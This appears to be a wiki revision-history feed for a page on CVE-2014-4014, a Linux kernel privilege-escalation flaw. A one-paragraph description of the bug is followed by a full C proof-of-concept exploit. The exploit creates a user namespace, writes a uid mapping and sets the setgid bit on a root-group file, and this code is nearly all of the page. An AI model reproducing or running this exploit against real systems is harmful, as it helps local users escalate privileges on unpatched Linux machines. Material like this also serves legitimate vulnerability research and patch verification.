https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2014-4014_Linux_kernel_before_3.14.8_%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9ECVE-2014-4014 Linux kernel before 3.14.8 權限提升漏洞 - Revision history2026-04-26T14:01:28ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2014-4014_Linux_kernel_before_3.14.8_%E6%AC%8A%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E&diff=1079&oldid=prevPwnwiki: Created page with "==INFO== The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to b..."2021-04-07T03:33:00Z<p>Created page with "==INFO== The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to b..."</p>
<p><b>New page</b></p><div>==INFO==<br />
The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.<br />
<br />
==cve-2014-4014.c==<br />
<pre><br />
/**<br />
* CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC<br />
*<br />
* Vitaly Nikolenko<br />
* vnik5287@gmail.com<br />
*/<br />
<br />
#define _GNU_SOURCE<br />
#include <sys/wait.h><br />
#include <sched.h><br />
#include <stdio.h><br />
#include <stdlib.h><br />
#include <unistd.h><br />
#include <fcntl.h><br />
#include <limits.h><br />
#include <string.h><br />
#include <assert.h><br />
<br />
#define STACK_SIZE (1024 * 1024)<br />
static char child_stack[STACK_SIZE];<br />
<br />
struct args {<br />
int pipe_fd[2];<br />
char *file_path;<br />
};<br />
<br />
static int child(void *arg) {<br />
struct args *f_args = (struct args *)arg;<br />
char c;<br />
<br />
// close stdout<br />
close(f_args->pipe_fd[1]); <br />
<br />
assert(read(f_args->pipe_fd[0], &c, 1) == 0);<br />
<br />
// set the setgid bit<br />
chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);<br />
<br />
return 0;<br />
}<br />
<br />
int main(int argc, char *argv[]) {<br />
int fd;<br />
pid_t pid;<br />
char mapping[1024];<br />
char map_file[PATH_MAX];<br />
struct args f_args;<br />
<br />
assert(argc == 2);<br />
<br />
f_args.file_path = argv[1];<br />
// create a pipe for synching the child and parent<br />
assert(pipe(f_args.pipe_fd) != -1);<br />
<br />
pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);<br />
assert(pid != -1);<br />
<br />
// get the current uid outside the namespace<br />
snprintf(mapping, 1024, "0 %d 1\n", getuid()); <br />
<br />
// update uid and gid maps in the child<br />
snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);<br />
fd = open(map_file, O_RDWR); assert(fd != -1);<br />
<br />
assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));<br />
close(f_args.pipe_fd[1]);<br />
<br />
assert (waitpid(pid, NULL, 0) != -1);<br />
}<br />
<br />
</pre></div>Pwnwiki